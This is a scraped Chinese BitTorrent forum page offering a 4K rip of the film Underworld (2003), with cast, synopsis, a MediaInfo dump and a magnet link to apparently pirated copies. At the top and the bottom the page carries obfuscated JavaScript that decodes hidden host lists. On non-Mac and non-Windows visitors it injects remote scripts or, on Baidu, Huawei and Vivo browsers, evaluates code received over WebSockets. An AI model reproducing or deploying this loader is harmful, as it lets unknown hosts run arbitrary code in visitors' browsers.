黑夜传说[双语字幕].Underworld.2003.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit 16.21GB

版主小s 24天前 207

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 黑夜传说 / 妖夜寻狼(港) / 决战异世界(台)

◎片 名 Underworld

◎年 代 2003

◎产 地 英国 / 德国 / 匈牙利 / 美国

◎类 别 动作 / 惊悚 / 奇幻

◎语 言 英语

◎上映日期 2003-09-08(多伦多电影节) / 2003-09-19(美国)

◎IMDb链接 https://www.imdb.com/title/tt0320691/

◎豆瓣评分 7.5/10 (88492人评价)

◎豆瓣链接 https://movie.douban.com/subject/1307527/

◎片 长 121分钟

◎导 演 伦·怀斯曼 Len Wiseman (id:1031983)

◎编 剧 凯文·格雷维奥斯 Kevin Grevioux (id:1336254)

伦·怀斯曼 Len Wiseman (id:1031983)

Danny McBride Danny McBride (id:1349517)

◎演 员 凯特·贝金赛尔 Kate Beckinsale (id:1003487)

斯科特·斯比德曼 Scott Speedman (id:1049589)

麦克·辛 Michael Sheen (id:1004566)

山恩·布罗利 Shane Brolly (id:1032192)

比尔·奈伊 Bill Nighy (id:1041002)

艾尔文·莱德 Erwin Leder (id:1025389)

索菲娅·迈尔斯 Sophia Myles (id:1031869)

罗比·基 Robbie Gee (id:1098633)

温特沃斯·米勒 Wentworth Miller (id:1041028)

凯文·格雷维奥斯 Kevin Grevioux (id:1336254)

兹塔·格罗格 Zita G?r?g (id:1181241)

汉克·阿莫斯 Hank Amos (id:1277175)

理查德·赛特伦 Richard Cetrone (id:1280368)

Mike Mukatis Mike Mukatis (id:1292670)

Sándor Boros Sándor Boros (id:1066501)

安德烈·巴顿 Andreas Patton (id:1042279)

Danny McBride Danny McBride (id:1349517)

Jázmin Dammak Jázmin Dammak (id:1215733)

Ildikó Kovács Ildikó Kovács (id:1046198)

Ekkehardt Belle Ekkehardt Belle (id:1066358)

Reinhard Brock Reinhard Brock (id:1044749)

Pascal Breuer Pascal Breuer (id:1077591)

布莱恩·斯蒂尔 Brian Steele (id:1052093)

Kurt Carley Kurt Carley (id:1070768)

Zoltan Papp Zoltan Papp (id:1169352)

汤姆·罗森伯格 Tom Rosenberg (id:1296083)

Henry Winterstern Henry Winterstern (id:1306229)

加里·卢切西 Gary Lucchesi (id:1290411)

Skip Williamson Skip Williamson (id:1305268)

理查德·S·莱特 Richard S. Wright (id:1023608)

保罗·海斯林格 Paul Haslinger (id:1037358)

托尼·皮尔斯-罗伯茨 Tony Pierce-Roberts (id:1294521)

凯文·菲普斯 Kevin Phipps (id:1051186)

马尔科姆·斯托 Malcolm Stone (id:1298501)

Wendy Partridge Wendy Partridge (id:1294032)

特雷福·普朗德 Trefor Proud (id:1294946)

Cristina Patterson Ceret Cristina Patterson Ceret (id:1133266)

巴拉茨·诺瓦克 Balázs Novák (id:1293310)

托马斯·弗洛茨 Thomas Floutz (id:1283888)

卡塔琳·贾科茨 Katalin Jakots (id:1287550)

Brad Martin Brad Martin (id:1014368)

Gábor Gajdos Gábor Gajdos (id:1091761)

西蒙·伊曼纽尔 Simon Emanuel (id:1008402)

Tamás Vass Tamás Vass (id:1192162)

Daren Horley Daren Horley (id:1286917)

小吉恩·沃伦 Gene Warren Jr. (id:1300455)

托尼·马加莱塔 Tony Magaletta (id:1124827)

Balázs Harmati Balázs Harmati (id:1191575)

Andrew Shuford Andrew Shuford (id:1187488)

Owen Hammer Owen Hammer (id:1285922)

David Parker David Parker (id:1310442)

Nicolas Bonnell (id:1224316)

Gary J. Brown Gary J. Brown (id:1306955)

蒂姆·基恩 Tim Keene (id:1112869)

塔拉·沃克 Tara Walker (id:1004232)

阿德里安·梅特泽拉尔 Adrian Metzelaar (id:1303871)

Robert Ashe Jr. Robert Ashe Jr. (id:1021058)

Gene Warren III Gene Warren III (id:1013356)

克里斯汀·王 Christine Wong (id:1304145)

Pedro Sabrosa Pedro Sabrosa (id:1296427)

Victor Wade Victor Wade (id:1302191)

◎标 签 吸血鬼 / 魔幻 / 美国 / 动作 / 科幻 / 奇幻 / 美国电影 / 惊悚

◎简 介

地球上一直存在着一个黑暗的地下世界。那里,两大种族――吸血鬼和狼人――在斗得你死我活,每一方都以消灭对方种族为最终目标。

一次,吸血鬼族的“月神”西丽妮(凯特?贝金赛尔 Kate Beckinsale 饰)在追杀几个落败的狼人时发现,狼人正在密谋绑架人类的一名医生麦克尔 (斯科特?斯比德曼 Scott Speedman 饰)。心知狼人必有所图,西丽妮独自前往狼窝查探。不料中了狼人的埋伏,身负重伤之际幸得麦克尔相救。在麦克尔送西丽妮回吸血鬼营地的途中,他意外被一只狼人咬伤了,由此揭开了麦克尔的身世之谜和狼人的阴谋……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 285685527436384806958909225251539192415 (0xD6ED07FC831B9423BD1748CC3EC70A5F)

  4. Complete name : Underwo[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 16.2 GiB

  8. Duration : 2 h 13 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 17.4 Mb/s

  11. Movie name : Underworld 2003 2160p HDR UHD BluRay TrueHD 7.1 Atmos [email protected]

  12. Encoded date : UTC 2021-11-03 12:49:10

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. HDR format : SMPTE ST 2086, HDR10 compatible

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 13 min

  23. Bit rate : 12.3 Mb/s

  24. Width : 3 840 pixels

  25. Height : 1 600 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.084

  33. Stream size : 11.5 GiB (71%)

  34. Title : @HDSky

  35. Writing library : x265 - H.265/HEVC codec

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : Display P3

  43. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level : 739 cd/m2

  45. Maximum Frame-Average Light Level : 331 cd/m2


  46. Audio

  47. ID : 2

  48. Format : MLP FBA 16-ch

  49. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  50. Commercial name : Dolby TrueHD with Dolby Atmos

  51. Codec ID : A_TRUEHD

  52. Duration : 2 h 13 min

  53. Bit rate mode : Variable

  54. Bit rate : 4 932 kb/s

  55. Maximum bit rate : 8 271 kb/s

  56. Channel(s) : 8 channels

  57. Channel layout : L R C LFE Ls Rs Lb Rb

  58. Sampling rate : 48.0 kHz

  59. Frame rate : 1 200.000 FPS (40 SPF)

  60. Compression mode : Lossless

  61. Stream size : 4.60 GiB (28%)

  62. Title : English

  63. Language : English

  64. Default : Yes

  65. Forced : No

  66. Number of dynamic objects : 11

  67. Bed channel count : 1 channel

  68. Bed channel configuration : LFE


  69. Text #1

  70. ID : 3

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 2 h 12 min

  76. Bit rate : 19.0 kb/s

  77. Count of elements : 2086

  78. Stream size : 18.1 MiB (0%)

  79. Title : ENG

  80. Language : English

  81. Default : Yes

  82. Forced : No


  83. Text #2

  84. ID : 4

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 2 h 5 min

  90. Bit rate : 16.1 kb/s

  91. Count of elements : 1372

  92. Stream size : 14.4 MiB (0%)

  93. Title : CHS

  94. Language : Chinese

  95. Default : No

  96. Forced : No


  97. Text #3

  98. ID : 5

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 2 h 5 min

  104. Bit rate : 16.5 kb/s

  105. Count of elements : 1372

  106. Stream size : 14.8 MiB (0%)

  107. Title : CHT

  108. Language : Chinese

  109. Default : No

  110. Forced : No


  111. Text #4

  112. ID : 6

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 2 h 5 min

  118. Bit rate : 27.0 kb/s

  119. Count of elements : 1372

  120. Stream size : 24.2 MiB (0%)

  121. Title : CHS&ENG

  122. Language : Chinese

  123. Default : No

  124. Forced : No


  125. Text #5

  126. ID : 7

  127. Format : PGS

  128. Muxing mode : zlib

  129. Codec ID : S_HDMV/PGS

  130. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  131. Duration : 2 h 5 min

  132. Bit rate : 27.4 kb/s

  133. Count of elements : 1372

  134. Stream size : 24.5 MiB (0%)

  135. Title : CHT&ENG

  136. Language : Chinese

  137. Default : No

  138. Forced : No


  139. Menu

  140. 00:00:00.000 : en:Chapter 01

  141. 00:09:22.311 : en:Chapter 02

  142. 00:18:48.000 : en:Chapter 03

  143. 00:24:29.759 : en:Chapter 04

  144. 00:34:06.126 : en:Chapter 05

  145. 00:40:29.802 : en:Chapter 06

  146. 00:47:24.215 : en:Chapter 07

  147. 00:58:32.634 : en:Chapter 08

  148. 01:04:59.311 : en:Chapter 09

  149. 01:12:03.777 : en:Chapter 10

  150. 01:18:21.529 : en:Chapter 11

  151. 01:24:56.256 : en:Chapter 12

  152. 01:32:42.640 : en:Chapter 13

  153. 01:42:44.740 : en:Chapter 14

  154. 01:51:41.985 : en:Chapter 15

  155. 02:03:43.998 : en:Chapter 16




复制代码


TAGS 动作 奇幻 惊悚

磁力链:
  • magnet:?xt=urn:btih:A883445FC30846655EDAF5039E317798081DC84D

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};